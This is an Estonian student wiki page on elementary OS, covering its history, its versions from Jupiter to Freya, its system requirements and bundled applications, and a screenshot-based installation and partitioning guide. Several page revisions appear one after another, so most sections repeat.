Miks ma just selle teema valisin? Lauaarvuti, mis tänaseks juba rohkem kui 1.5 aastat niisama laua peal seisnud ja tolmu kogunud on, jooksutab ilmselt eOS-i esimest versiooni Jupiteri (parimal juhul Luna beta 1-te), ent millegipärast ei jõudnudki ma kunagi sellega tutvust sobitada. See on ka üks põhjuseid, miks valisin just teemaks Elementary OS-i, et ise rohkem aimu saada, mis mul laua peal seisab ja samas kuuldu järgi tundus, et tegu on üsnagi jätkusuutliku projektiga- iga-aastaselt on seni katsutud uue versiooniga välja tulla ja ehk on lootust, et sellest areneb ühel päeval midagi suurematki välja.

=='''Linke külastamiseks'''==

*eOS – mitte ainult vaese mehe Apple: http://www.techrepublic.com/article/elementary-os-not-just-the-poor-mans-apple/

*Ühe kasutaja kogemus Pantheoniga: http://www.networkworld.com/article/2599415/opensource-subnet/the-linux-desktop-a-week-review-elementary-oss-pantheon.html

*20 asja, mida pärast eOS Luna paigaldamist teha: http://www.binarytides.com/better-elementary-os-luna/

*15 asja, mida pärast eOS Freya beta 1 paigaldamist teha: http://lmelinux.net/2014/09/15/things-installing-elementary-os-freya-beta/

*Ülemise paneeli kujundamine: http://ubuntuhandbook.org/index.php/2013/10/customize-elementaryos-panel/

*Synapse Indicator: http://www.webupd8.org/2013/06/synapse-indicator-new-search.html

*Dokk-i muutmine: http://rhoconlinux.github.io/plank-themer/

=='''Kasutatud kirjandus'''==

[1] http://elementaryos.org/journal/luna-beta-1-released

[2] http://www.askvg.com/elementary-os-jupiter-awesome-linux-distribution-based-on-ubuntu/

[3] http://elementaryos.org/journal/5-myths-about-elementary

[4] http://www.muylinux.com/2012/10/19/elementary-os-jupiter-deja-de-estar-disponible

[5] http://www.webupd8.org/2012/10/elementary-os-jupiter-no-longer.html

[6] http://www.webupd8.org/2012/11/elementary-os-luna-beta-1-available-for.html

[7] http://www.phoronix.com/scan.php?page=news_item&px=MTM2NjA

[8] http://www.muktware.com/2013/08/09/mysterious-countdown-appears-on-elementary-os-website/4557/

[9] https://lists.launchpad.net/elementary-dev-community/msg02577.html

[10] http://elementaryos.org/journal/elementary-os-isis-is-now-freya

[11] http://elementaryos.org/journal/freya-beta-1-available-for-developers-testers

[12] http://elementaryos.org/docs/user-guide/technical-specifications

[13] http://itsfoss.com/guide-install-elementary-os-luna/

=='''Autor'''==

Nimi: Kelly Tragel

Rühm: A21

Elementary OS paigaldamine

2015-01-15T12:30:35Z

Ktragel: /* elementary OS paigaldamine */

[[Category: Operatsioonisüsteemide administreerimine ja sidumine]]

=='''Mis on elementary OS? '''==

[[File:Luna.png|thumb|right|350px|elementary OS "Luna"]]

elementary OS (edaspidi eOS) on Ubuntul baseeruv Linuxi distributsioon. Selle peamine erinevus võrreldes Ubuntuga on, et kui viimane kasutab töölauakeskkonnana Unity-t, siis eOS-le on kirjutatud päris 0-st üles oma kasutajaliides- Pantheon. See on hästi lõimitud spetsiaalselt eOS-le loodud rakendustega nagu Plank (kiirkäivitusriba), Midori (vaikimisi veebibrauser) ja Scratch (lihtne teksti redigeerimise tööriist). [1]

=='''Visioon ja taust'''==

Liikvel olevate eksiarvamuste tagasi lükkamiseks tuleb öelda, et eOS ei ole lihtsalt kamba arendajate poolt loodud kujundus, mida Ubuntu all nn programmi näol käivitada saaks. eOS sai küll alguse teemade ja rakenduste komplektist, mis olid algselt mõeldud Ubuntule, kuid ajaga kasvas sellest siiski välja täiesti uus distributsioon. Jäädes aga seejuures Ubuntu põhiseks, ühilduvad viimase repositooriumid ja paketid täielikult eOS-ga. [2]

Kasutajaliides Pantheon on saanud oma praeguse kuju ajast, mil arendusmeeskond pärast Jupiteri välja laskmist leidis, et kasutajakogemuse parandamiseks tuleks töölaua keskkond uuel moel üles ehitada. GNOME-lt kisti küljest kõik, mida ei tahetud ega peetud vajalikuks ning vahetati välja uute, omalt poolt ehitatud asendustega. Pantheon-i eesmärgiks on seatud olla intuitsioonil põhinev (kergesti hoomatav ja käsitletav), mis ei ehmataks esimese hooga uut kasutajat ära, ega nõuaks ülearust “nuputamist”. [3]

=='''Versioonid'''==

Esimene stabiilne versioon eOS-st kandis nime Jupiter ning tuli välja 31. märtsil 2011. See baseerus Ubuntu 10.10 versioonil, kuid pärast 2012. aasta oktoobrit ei ole enam toestatud ega ka ametlikul kodulehel (http://elementaryos.org/) kättesaadav. [4][5]

Teine versioon eOS-le avaldati 2012. aasta novembris, kuid sel puhul oli tegu beta versiooniga, mis kandis koodnimetust Luna. Luna põhineb Ubuntu 12.04 LTS versioonil. [6] Pea pool aastat hiljem, 6. mai 2013 tuli välja ka Luna teine beta versioon , mis parandas enam kui 300 tarkvaralist viga ning viis sisse ka mitmeid teisi muudatusi. Näiteks laiendas uus versioon regioonide valikut, juurde tuli mitme kuva toetus, sisse viidi visuaalseid täiustusi ning uuendati ühes rakendusi. [6][7] 7. augustil 2013 ilmus ametlikule koduleheküljele stardiloendur, mis lõppes 3 päeva hiljem, 10. augustil, teise stabiilse versiooni väljalaskmisega. [8][1]

Kolmanda stabiilse versiooni nimi Isis, sai välja käidud veel sama aasta augustis projekti liidri Daniel Foré poolt. [9] Nimi muudeti hiljem Freya-ks, et vältida sarnasusseost militaristliku grupi ISIS-ega. [10] Esimene beta versioon Freya-st avaldati 11. augustil 2014. aastal ning see toetub Ubuntu 14.04 LTS versioonile. [9][11]

=='''elementary OS paigaldamine'''==

Miinimumnõuded arvutile [12]:
* 1 GHz x86 protsessor
* 512MB põhimälu (RAM) (soovituslik: 1GB)
* 5GB vaba kettaruumi (soovituslik: 15GB)
* Graafikakaardi ja ekraani lahutusvõime 1024x768
* CD/DVD-lugeja või USB-lt bootimise võimalus

Tarkvara, mis ühes eOS Lunaga kaasa tuleb [12]:
* File Roller: arhiivihaldur
* Geary: E-posti klient
* GNOME Calculator (ehk gcalctool): kalkulaator
* Empathy: kiirsuhtlus- ja Internetitelefoni (VoIP) klient
* Maya: kalender
* Midori: veebibrauser
* Noise: audiomängija
* Pantheon Files: failihaldur
* Pantheon Terminal: terminaliemulaator
* Scratch: tekstiredaktor
* Screenshot: kuvatõmmiste tegemise tööriist
* Shotwell: fotohaldur
* Simple Scan: dokumentide skaneerimise tööriist
* Switchboard System Settings: juhtpaneel (funktsioonilt sarnaneb Windowsi Control Panel-ile)
* Totem: filmimängija
* Ubuntu Software Center: tarkvarahaldur
* Update manager: uuendushaldur

----

eOS on antud tasuta kasutusse, muidugi võimalusega vabatahtlikel arendusmeeskonda rahaliselt toetada.
Installatsiooni viisardiks on Ubiquity, mis on tuttav juba Ubuntust ja ühtlasi leiab kasutust ka temast “tuletatud” distributsioonidel.
(Kõik järgnevad installatsiooni pildid on võetud välisest allikast) [13]

==== Samm 1: Loo Live USB või CD ====

Esmalt tuleks luua Live CD/USB, millega saab eOS-i kas arvutisse installida või vajadusel ka kasutada otseselt ilma süsteemi paigaldamata. Kuidas seda teha, loe täpsemalt [http://www.ubuntu.com/download/desktop/ siit] või [http://elementaryos.org/docs/user-guide/creating-an-install-disk siit].

==== Samm 2: Bootimine ====

Ühenda Live USB või ketas seadmega ja taaskäivita arvuti. Hetkel, mil arvuti end üles bootib, vajuta F10 või F12, et jõuda boot menüüsse. Sealt tuleks valida vastavalt kas USB, CDROM, Removable Media või muud sarnast (rohkem abi [http://elementaryos.org/docs/user-guide/booting-the-install-disk siit]).

==== Samm 3: Alusta paigaldamist ====

Järgnevalt peaks ilmuma installatsiooni aken, kus tuleb ära märkida keel ning valida emma-kumma vahel, kas proovida või paigaldada eOS kohe arvutisse.

[[File:In1.jpg|500px|Valik1]]

Seejärel näidatakse, kas kõik (osa soovituslikke) nõuded on täidetud: vähemalt 4.3GB vaba kettaruumi, olemasolev ühendus vooluallikaga ja Internetiga. Lisaks on võimalus valida, kas installeerida uuendused ühes eOS-i enda paigaldamisega või, kas paigaldada ka ühes kolmandate osapoolte tarkvara.

[[File:In2.jpg|500px|Valik2]]

==== Samm 4: Partitsioonide loomine ====

Tuleb langetada otsus, kas tühjendada kogu kõvaketas ja paigaldada sellele üksnes eOS või luua eOS-le uus partitsioon, et paigaldada see juba näiteks mõne muu olemasoleva operatsioonisüsteemi kõrvale.

[[File:In4.jpg|500px|Valik3]]

==== Samm 5: Loo root, swap ja home ====

Vaba kettaruumi kujutab endast Device tulbas free space rida. Alustuseks loome root partitsiooni: klõpsa free space reale ja vajuda Add…

[[File:In3.jpg|500px|Valik4]]

Järgnevalt vali root-i suurus (hea valik langeb 2GB ja 8GB vahele), märgi failisüsteemiks ext4 ja ja mount point-iks / (ehk root).

[[File:In6.png|500px|Valik5]]

Pärast seda loome swap partitsiooni. Üldine soovitus on, et swap suurus võiks olla 50% kuni 100% füüsilise RAM-i suurusest.

[[File:In5.png|500px|Valik6]]

Ning viimasena loome Home partitsiooni. Home-le tuleks kõige rohkem ruumi anda, sest see on koht, kuhu hakatakse üldiselt kõiki meie faile jms talletama.

[[File:In7.png|500px|Valik7]]

Pärast edukat Root, Swap ja Home partitsioonide loomist tuleb vajutada Install Now.

[[File:In8.jpg|500px|Valik8]]

==== Samm 6: Trivaalsete juhendite jälgimine ====

Märkida tuleb ära asukoht, kus me parasjagu oleme, klaviatuuri asetus ning anda masinale nimi ja luua sisse logimiseks kasutaja.
Kui paigaldamine on lõppenud, ilmub järgnev aken:

[[File:In9.png|500px|Valik9]]

Soovituslik oleks teha masinale restart.

=='''Kokkuvõte'''==

elementary OS märksõnadeks võiksid olla: kasutuslihtsus, kergus ja minimalistlik disain ehk teisisõnu on tegu trendika Linuxi distroga. Minu tähelepanek: töölaua keskkonnal Pantheon-il on mõningaid ühiseid jooni just funktsioneerimise ja visuaalse poole pealt Mac OS X-I ja GNOME Shell-iga.

Miks ma just selle teema valisin? Lauaarvuti, mis tänaseks juba rohkem kui 1.5 aastat niisama laua peal seisnud ja tolmu kogunud on, jooksutab ilmselt eOS-i esimest versiooni Jupiteri (parimal juhul Luna beta 1-te), ent millegipärast ei jõudnudki ma kunagi sellega tutvust sobitada. See on ka üks põhjuseid, miks valisin just teemaks Elementary OS-i, et ise rohkem aimu saada, mis mul laua peal seisab ja samas kuuldu järgi tundus, et tegu on üsnagi jätkusuutliku projektiga- iga-aastaselt on seni katsutud uue versiooniga välja tulla ja ehk on lootust, et sellest areneb ühel päeval midagi suurematki välja.

=='''Linke külastamiseks'''==

*eOS – mitte ainult vaese mehe Apple: http://www.techrepublic.com/article/elementary-os-not-just-the-poor-mans-apple/

*Ühe kasutaja kogemus Pantheoniga: http://www.networkworld.com/article/2599415/opensource-subnet/the-linux-desktop-a-week-review-elementary-oss-pantheon.html

*20 asja, mida pärast eOS Luna paigaldamist teha: http://www.binarytides.com/better-elementary-os-luna/

*15 asja, mida pärast eOS Freya beta 1 paigaldamist teha: http://lmelinux.net/2014/09/15/things-installing-elementary-os-freya-beta/

*Ülemise paneeli kujundamine: http://ubuntuhandbook.org/index.php/2013/10/customize-elementaryos-panel/

*Synapse Indicator: http://www.webupd8.org/2013/06/synapse-indicator-new-search.html

*Dokk-i muutmine: http://rhoconlinux.github.io/plank-themer/

=='''Kasutatud kirjandus'''==

[1] http://elementaryos.org/journal/luna-beta-1-released

[2] http://www.askvg.com/elementary-os-jupiter-awesome-linux-distribution-based-on-ubuntu/

[3] http://elementaryos.org/journal/5-myths-about-elementary

[4] http://www.muylinux.com/2012/10/19/elementary-os-jupiter-deja-de-estar-disponible
[4] http://itsfoss.com/guide-install-elementary-os-luna/

[5] http://www.webupd8.org/2012/10/elementary-os-jupiter-no-longer.html

[6] http://www.webupd8.org/2012/11/elementary-os-luna-beta-1-available-for.html

[7] http://www.phoronix.com/scan.php?page=news_item&px=MTM2NjA

[8] http://www.muktware.com/2013/08/09/mysterious-countdown-appears-on-elementary-os-website/4557/

[9] https://lists.launchpad.net/elementary-dev-community/msg02577.html

[10] http://elementaryos.org/journal/elementary-os-isis-is-now-freya

[11] http://elementaryos.org/journal/freya-beta-1-available-for-developers-testers

[12] http://elementaryos.org/docs/user-guide/technical-specifications

=='''Autor'''==

Nimi: Kelly Tragel

Rühm: A21

Elementary OS paigaldamine

2015-01-15T12:29:51Z

Ktragel: /* Kasutatud kirjandus */

[[Category: Operatsioonisüsteemide administreerimine ja sidumine]]

=='''Mis on elementary OS? '''==

[[File:Luna.png|thumb|right|350px|elementary OS "Luna"]]

elementary OS (edaspidi eOS) on Ubuntul baseeruv Linuxi distributsioon. Selle peamine erinevus võrreldes Ubuntuga on, et kui viimane kasutab töölauakeskkonnana Unity-t, siis eOS-le on kirjutatud päris 0-st üles oma kasutajaliides- Pantheon. See on hästi lõimitud spetsiaalselt eOS-le loodud rakendustega nagu Plank (kiirkäivitusriba), Midori (vaikimisi veebibrauser) ja Scratch (lihtne teksti redigeerimise tööriist). [1]

=='''Visioon ja taust'''==

Liikvel olevate eksiarvamuste tagasi lükkamiseks tuleb öelda, et eOS ei ole lihtsalt kamba arendajate poolt loodud kujundus, mida Ubuntu all nn programmi näol käivitada saaks. eOS sai küll alguse teemade ja rakenduste komplektist, mis olid algselt mõeldud Ubuntule, kuid ajaga kasvas sellest siiski välja täiesti uus distributsioon. Jäädes aga seejuures Ubuntu põhiseks, ühilduvad viimase repositooriumid ja paketid täielikult eOS-ga. [2]

Kasutajaliides Pantheon on saanud oma praeguse kuju ajast, mil arendusmeeskond pärast Jupiteri välja laskmist leidis, et kasutajakogemuse parandamiseks tuleks töölaua keskkond uuel moel üles ehitada. GNOME-lt kisti küljest kõik, mida ei tahetud ega peetud vajalikuks ning vahetati välja uute, omalt poolt ehitatud asendustega. Pantheon-i eesmärgiks on seatud olla intuitsioonil põhinev (kergesti hoomatav ja käsitletav), mis ei ehmataks esimese hooga uut kasutajat ära, ega nõuaks ülearust “nuputamist”. [3]

=='''Versioonid'''==

Esimene stabiilne versioon eOS-st kandis nime Jupiter ning tuli välja 31. märtsil 2011. See baseerus Ubuntu 10.10 versioonil, kuid pärast 2012. aasta oktoobrit ei ole enam toestatud ega ka ametlikul kodulehel (http://elementaryos.org/) kättesaadav. [4][5]

Teine versioon eOS-le avaldati 2012. aasta novembris, kuid sel puhul oli tegu beta versiooniga, mis kandis koodnimetust Luna. Luna põhineb Ubuntu 12.04 LTS versioonil. [6] Pea pool aastat hiljem, 6. mai 2013 tuli välja ka Luna teine beta versioon , mis parandas enam kui 300 tarkvaralist viga ning viis sisse ka mitmeid teisi muudatusi. Näiteks laiendas uus versioon regioonide valikut, juurde tuli mitme kuva toetus, sisse viidi visuaalseid täiustusi ning uuendati ühes rakendusi. [6][7] 7. augustil 2013 ilmus ametlikule koduleheküljele stardiloendur, mis lõppes 3 päeva hiljem, 10. augustil, teise stabiilse versiooni väljalaskmisega. [8][1]

Kolmanda stabiilse versiooni nimi Isis, sai välja käidud veel sama aasta augustis projekti liidri Daniel Foré poolt. [9] Nimi muudeti hiljem Freya-ks, et vältida sarnasusseost militaristliku grupi ISIS-ega. [10] Esimene beta versioon Freya-st avaldati 11. augustil 2014. aastal ning see toetub Ubuntu 14.04 LTS versioonile. [9][11]

=='''elementary OS paigaldamine'''==

Miinimumnõuded arvutile [12]:
* 1 GHz x86 protsessor
* 512MB põhimälu (RAM) (soovituslik: 1GB)
* 5GB vaba kettaruumi (soovituslik: 15GB)
* Graafikakaardi ja ekraani lahutusvõime 1024x768
* CD/DVD-lugeja või USB-lt bootimise võimalus

Tarkvara, mis ühes eOS Lunaga kaasa tuleb [2]:
* File Roller: arhiivihaldur
* Geary: E-posti klient
* GNOME Calculator (ehk gcalctool): kalkulaator
* Empathy: kiirsuhtlus- ja Internetitelefoni (VoIP) klient
* Maya: kalender
* Midori: veebibrauser
* Noise: audiomängija
* Pantheon Files: failihaldur
* Pantheon Terminal: terminaliemulaator
* Scratch: tekstiredaktor
* Screenshot: kuvatõmmiste tegemise tööriist
* Shotwell: fotohaldur
* Simple Scan: dokumentide skaneerimise tööriist
* Switchboard System Settings: juhtpaneel (funktsioonilt sarnaneb Windowsi Control Panel-ile)
* Totem: filmimängija
* Ubuntu Software Center: tarkvarahaldur
* Update manager: uuendushaldur

----

eOS on antud tasuta kasutusse, muidugi võimalusega vabatahtlikel arendusmeeskonda rahaliselt toetada.
Installatsiooni viisardiks on Ubiquity, mis on tuttav juba Ubuntust ja ühtlasi leiab kasutust ka temast “tuletatud” distributsioonidel.
(Kõik järgnevad installatsiooni pildid on võetud välisest allikast [4].)

==== Samm 1: Loo Live USB või CD ====

Esmalt tuleks luua Live CD/USB, millega saab eOS-i kas arvutisse installida või vajadusel ka kasutada otseselt ilma süsteemi paigaldamata. Kuidas seda teha, loe täpsemalt [http://www.ubuntu.com/download/desktop/ siit] või [http://elementaryos.org/docs/user-guide/creating-an-install-disk siit].

==== Samm 2: Bootimine ====

Ühenda Live USB või ketas seadmega ja taaskäivita arvuti. Hetkel, mil arvuti end üles bootib, vajuta F10 või F12, et jõuda boot menüüsse. Sealt tuleks valida vastavalt kas USB, CDROM, Removable Media või muud sarnast (rohkem abi [http://elementaryos.org/docs/user-guide/booting-the-install-disk siit]).

==== Samm 3: Alusta paigaldamist ====

Järgnevalt peaks ilmuma installatsiooni aken, kus tuleb ära märkida keel ning valida emma-kumma vahel, kas proovida või paigaldada eOS kohe arvutisse.

[[File:In1.jpg|500px|Valik1]]

Seejärel näidatakse, kas kõik (osa soovituslikke) nõuded on täidetud: vähemalt 4.3GB vaba kettaruumi, olemasolev ühendus vooluallikaga ja Internetiga. Lisaks on võimalus valida, kas installeerida uuendused ühes eOS-i enda paigaldamisega või, kas paigaldada ka ühes kolmandate osapoolte tarkvara.

[[File:In2.jpg|500px|Valik2]]

==== Samm 4: Partitsioonide loomine ====

Tuleb langetada otsus, kas tühjendada kogu kõvaketas ja paigaldada sellele üksnes eOS või luua eOS-le uus partitsioon, et paigaldada see juba näiteks mõne muu olemasoleva operatsioonisüsteemi kõrvale.

[[File:In4.jpg|500px|Valik3]]

==== Samm 5: Loo root, swap ja home ====

Vaba kettaruumi kujutab endast Device tulbas free space rida. Alustuseks loome root partitsiooni: klõpsa free space reale ja vajuda Add…

[[File:In3.jpg|500px|Valik4]]

Järgnevalt vali root-i suurus (hea valik langeb 2GB ja 8GB vahele), märgi failisüsteemiks ext4 ja ja mount point-iks / (ehk root).

[[File:In6.png|500px|Valik5]]

Pärast seda loome swap partitsiooni. Üldine soovitus on, et swap suurus võiks olla 50% kuni 100% füüsilise RAM-i suurusest.

[[File:In5.png|500px|Valik6]]

Ning viimasena loome Home partitsiooni. Home-le tuleks kõige rohkem ruumi anda, sest see on koht, kuhu hakatakse üldiselt kõiki meie faile jms talletama.

[[File:In7.png|500px|Valik7]]

Pärast edukat Root, Swap ja Home partitsioonide loomist tuleb vajutada Install Now.

[[File:In8.jpg|500px|Valik8]]

==== Samm 6: Trivaalsete juhendite jälgimine ====

Märkida tuleb ära asukoht, kus me parasjagu oleme, klaviatuuri asetus ning anda masinale nimi ja luua sisse logimiseks kasutaja.
Kui paigaldamine on lõppenud, ilmub järgnev aken:

[[File:In9.png|500px|Valik9]]

Soovituslik oleks teha masinale restart.

=='''Kokkuvõte'''==

elementary OS märksõnadeks võiksid olla: kasutuslihtsus, kergus ja minimalistlik disain ehk teisisõnu on tegu trendika Linuxi distroga. Minu tähelepanek: töölaua keskkonnal Pantheon-il on mõningaid ühiseid jooni just funktsioneerimise ja visuaalse poole pealt Mac OS X-I ja GNOME Shell-iga.

Miks ma just selle teema valisin? Lauaarvuti, mis tänaseks juba rohkem kui 1.5 aastat niisama laua peal seisnud ja tolmu kogunud on, jooksutab ilmselt eOS-i esimest versiooni Jupiteri (parimal juhul Luna beta 1-te), ent millegipärast ei jõudnudki ma kunagi sellega tutvust sobitada. See on ka üks põhjuseid, miks valisin just teemaks Elementary OS-i, et ise rohkem aimu saada, mis mul laua peal seisab ja samas kuuldu järgi tundus, et tegu on üsnagi jätkusuutliku projektiga- iga-aastaselt on seni katsutud uue versiooniga välja tulla ja ehk on lootust, et sellest areneb ühel päeval midagi suurematki välja.

=='''Linke külastamiseks'''==

*eOS – mitte ainult vaese mehe Apple: http://www.techrepublic.com/article/elementary-os-not-just-the-poor-mans-apple/

*Ühe kasutaja kogemus Pantheoniga: http://www.networkworld.com/article/2599415/opensource-subnet/the-linux-desktop-a-week-review-elementary-oss-pantheon.html

*20 asja, mida pärast eOS Luna paigaldamist teha: http://www.binarytides.com/better-elementary-os-luna/

*15 asja, mida pärast eOS Freya beta 1 paigaldamist teha: http://lmelinux.net/2014/09/15/things-installing-elementary-os-freya-beta/

*Ülemise paneeli kujundamine: http://ubuntuhandbook.org/index.php/2013/10/customize-elementaryos-panel/

*Synapse Indicator: http://www.webupd8.org/2013/06/synapse-indicator-new-search.html

*Dokk-i muutmine: http://rhoconlinux.github.io/plank-themer/

=='''Kasutatud kirjandus'''==

[1] http://elementaryos.org/journal/luna-beta-1-released

[2] http://www.askvg.com/elementary-os-jupiter-awesome-linux-distribution-based-on-ubuntu/

[3] http://elementaryos.org/journal/5-myths-about-elementary

[4] http://www.muylinux.com/2012/10/19/elementary-os-jupiter-deja-de-estar-disponible
[4] http://itsfoss.com/guide-install-elementary-os-luna/

[5] http://www.webupd8.org/2012/10/elementary-os-jupiter-no-longer.html

[6] http://www.webupd8.org/2012/11/elementary-os-luna-beta-1-available-for.html

[7] http://www.phoronix.com/scan.php?page=news_item&px=MTM2NjA

[8] http://www.muktware.com/2013/08/09/mysterious-countdown-appears-on-elementary-os-website/4557/

[9] https://lists.launchpad.net/elementary-dev-community/msg02577.html

[10] http://elementaryos.org/journal/elementary-os-isis-is-now-freya

[11] http://elementaryos.org/journal/freya-beta-1-available-for-developers-testers

[12] http://elementaryos.org/docs/user-guide/technical-specifications

=='''Autor'''==

Nimi: Kelly Tragel

Rühm: A21